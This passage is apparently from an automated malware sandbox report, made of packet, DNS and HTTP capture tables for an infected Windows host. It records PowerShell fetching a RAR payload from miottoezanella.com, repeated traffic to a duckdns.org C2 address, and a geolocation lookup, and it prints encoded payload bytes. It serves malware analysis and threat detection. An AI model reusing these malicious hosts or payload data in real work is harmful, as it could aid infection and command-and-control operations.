                                                                                                      Oct 17, 2024 15:03:50.814356089 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814393044 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814404011 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814429998 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814461946 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814466000 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814497948 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814531088 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814548016 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814564943 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814620018 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814623117 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814640999 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814673901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814696074 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814714909 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814765930 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814800024 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814824104 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.814851046 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814884901 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.814898968 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820116997 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820167065 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820171118 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820204973 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820247889 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.820344925 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820378065 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820415020 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.820422888 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821031094 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821075916 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821110010 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821145058 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821178913 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821191072 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.821213961 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.821254969 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822038889 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822089911 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822125912 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822134018 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822165012 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822202921 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822208881 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822884083 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822917938 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822931051 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.822952032 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822985888 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.822994947 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823020935 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823062897 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823741913 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823777914 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823812008 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823821068 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.823846102 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.823889971 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826076984 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826112032 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826147079 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826163054 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826248884 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826282024 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826292038 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826316118 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826359034 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.826848030 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826880932 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826914072 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.826930046 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.827217102 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827250004 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827259064 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.827284098 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827318907 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.827505112 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827538967 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827573061 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.827575922 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.831207991 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.866894960 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.866985083 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.867017031 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.867048025 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.867080927 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.867089987 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908273935 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908368111 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908410072 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908446074 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908499002 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908502102 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908551931 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908605099 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908610106 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908638000 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908674002 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908684969 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908708096 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908742905 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908752918 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908796072 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908828020 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908843040 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908879995 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908915043 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908948898 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.908958912 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.908986092 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.909009933 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.941924095 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.941962004 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.941997051 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.941998005 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.942051888 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.942059994 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.942086935 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.942152977 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.943120003 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943254948 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943286896 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943303108 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.943321943 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943368912 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.943370104 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943432093 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943466902 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943480015 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.943506002 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.943553925 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:50.983484983 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.983525038 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.983558893 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:50.983589888 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:51.024328947 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024385929 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:51.024410963 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024446011 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024482012 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024491072 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:51.024516106 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024549961 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:51.024554014 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:51.064934015 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.888139009 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.893062115 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893126011 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893156052 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.893158913 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893188953 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.893196106 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893199921 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.893224955 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893291950 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893321037 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893371105 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893399000 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.893425941 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898298025 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898550987 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898565054 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898612976 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898626089 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898638964 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.898654938 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.910657883 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:53.916260004 CEST5152549859185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:53.916332006 CEST4985951525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:56.555666924 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:03:56.558089018 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:03:56.563338041 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:04:26.635195971 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:04:26.639230967 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:04:26.644491911 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:04:56.687809944 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:04:56.689558983 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:04:56.694384098 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:05:24.418140888 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:24.886763096 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:25.574317932 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:26.751234055 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:05:26.752856016 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:05:26.757927895 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:05:26.886727095 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:29.480496883 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:34.371083021 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:43.980465889 CEST4986080192.168.2.5178.237.33.50
                                                                                                      Oct 17, 2024 15:05:56.821024895 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:05:56.822993040 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:05:56.827994108 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:06:26.906086922 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:06:26.908046007 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:06:26.912924051 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:06:57.184550047 CEST5152549848185.236.203.101192.168.2.5
                                                                                                      Oct 17, 2024 15:06:57.190066099 CEST4984851525192.168.2.5185.236.203.101
                                                                                                      Oct 17, 2024 15:06:57.195034027 CEST5152549848185.236.203.101192.168.2.5

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 17, 2024 15:03:05.839698076 CEST5954253192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:05.877800941 CEST53595421.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:34.451427937 CEST5806253192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:34.706638098 CEST53580621.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:39.075403929 CEST5145353192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:40.075342894 CEST5145353192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:41.084570885 CEST5145353192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:43.086155891 CEST53514531.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:43.086201906 CEST53514531.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:43.086231947 CEST53514531.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:44.138720989 CEST5040953192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:44.959640980 CEST53504091.1.1.1192.168.2.5
                                                                                                      Oct 17, 2024 15:03:46.806915045 CEST5500453192.168.2.51.1.1.1
                                                                                                      Oct 17, 2024 15:03:46.816452026 CEST53550041.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 17, 2024 15:03:05.839698076 CEST192.168.2.51.1.1.10x32fcStandard query (0)miottoezanella.comA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:34.451427937 CEST192.168.2.51.1.1.10xc74Standard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:39.075403929 CEST192.168.2.51.1.1.10x8495Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:40.075342894 CEST192.168.2.51.1.1.10x8495Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:41.084570885 CEST192.168.2.51.1.1.10x8495Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:44.138720989 CEST192.168.2.51.1.1.10x145aStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:46.806915045 CEST192.168.2.51.1.1.10x74d3Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 17, 2024 15:03:05.877800941 CEST1.1.1.1192.168.2.50x32fcNo error (0)miottoezanella.com194.76.118.27A (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:34.706638098 CEST1.1.1.1192.168.2.50xc74No error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:34.706638098 CEST1.1.1.1192.168.2.50xc74No error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:43.086155891 CEST1.1.1.1192.168.2.50x8495Server failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:43.086201906 CEST1.1.1.1192.168.2.50x8495Server failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:43.086231947 CEST1.1.1.1192.168.2.50x8495Server failure (2)pelele.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:44.959640980 CEST1.1.1.1192.168.2.50x145aNo error (0)pelele.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                                                      Oct 17, 2024 15:03:46.816452026 CEST1.1.1.1192.168.2.50x74d3No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • miottoezanella.com
                                                                                                      • plieltd.top
                                                                                                      • geoplugin.net

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549860178.237.33.50801276C:\Windows\SysWOW64\msiexec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 17, 2024 15:03:46.823956013 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                      Host: geoplugin.net
                                                                                                      Cache-Control: no-cache
                                                                                                      Oct 17, 2024 15:03:47.683250904 CEST1165INHTTP/1.1 200 OK
                                                                                                      date: Thu, 17 Oct 2024 13:03:47 GMT
                                                                                                      server: Apache
                                                                                                      content-length: 957
                                                                                                      content-type: application/json; charset=utf-8
                                                                                                      cache-control: public, max-age=300
                                                                                                      access-control-allow-origin: *
                                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                      Data Ascii: { "geoplugin_request":"173.254.250.82", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549704194.76.118.274435576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-17 13:03:08 UTC176OUTGET /Hovedvrket.rar HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: miottoezanella.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-17 13:03:08 UTC253INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 17 Oct 2024 13:03:04 GMT
                                                                                                      Server: Apache
                                                                                                      Upgrade: h2,h2c
                                                                                                      Connection: Upgrade, close
                                                                                                      Last-Modified: Thu, 17 Oct 2024 11:16:48 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 452820
                                                                                                      Content-Type: application/x-rar-compressed
                                                                                                      2024-10-17 13:03:08 UTC7939INData Raw: 63 51 47 62 36 77 49 31 61 72 74 2f 2b 67 34 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6c 6a 64 56 67 37 36 77 4a 6b 68 33 45 42 6d 34 48 78 79 30 64 62 57 48 45 42 6d 2b 73 43 46 35 65 42 36 61 67 79 41 32 4e 78 41 5a 74 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 73 36 61 70 35 75 73 43 66 2b 68 78 41 5a 76 72 41 67 47 39 63 51 47 62 4d 63 72 72 41 76 71 74 63 51 47 62 69 52 51 4c 36 77 4b 34 70 6e 45 42 6d 39 48 69 36 77 4b 78 75 58 45 42 6d 34 50 42 42 4f 73 43 75 50 4e 78 41 5a 75 42 2b 55 47 59 50 51 4a 38 79 33 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 71 52 41 69 63 50 72 41 72 38 66 63 51 47 62 67 63 4d 2f 51 67 59 42 36 77 4b 79 73 6e 45 42 6d 37 72 4d 64 6b 68 5a 63 51 47 62 36 77 4c 55 51 59 48 79 6d 42 44
                                                                                                      Data Ascii: cQGb6wI1art/+g4AcQGbcQGbA1wkBHEBm3EBm7ljdVg76wJkh3EBm4Hxy0dbWHEBm+sCF5eB6agyA2NxAZtxAZtxAZtxAZu6s6ap5usCf+hxAZvrAgG9cQGbMcrrAvqtcQGbiRQL6wK4pnEBm9Hi6wKxuXEBm4PBBOsCuPNxAZuB+UGYPQJ8y3EBm3EBm4tEJARxAZvrAqRAicPrAr8fcQGbgcM/QgYB6wKysnEBm7rMdkhZcQGb6wLUQYHymBD
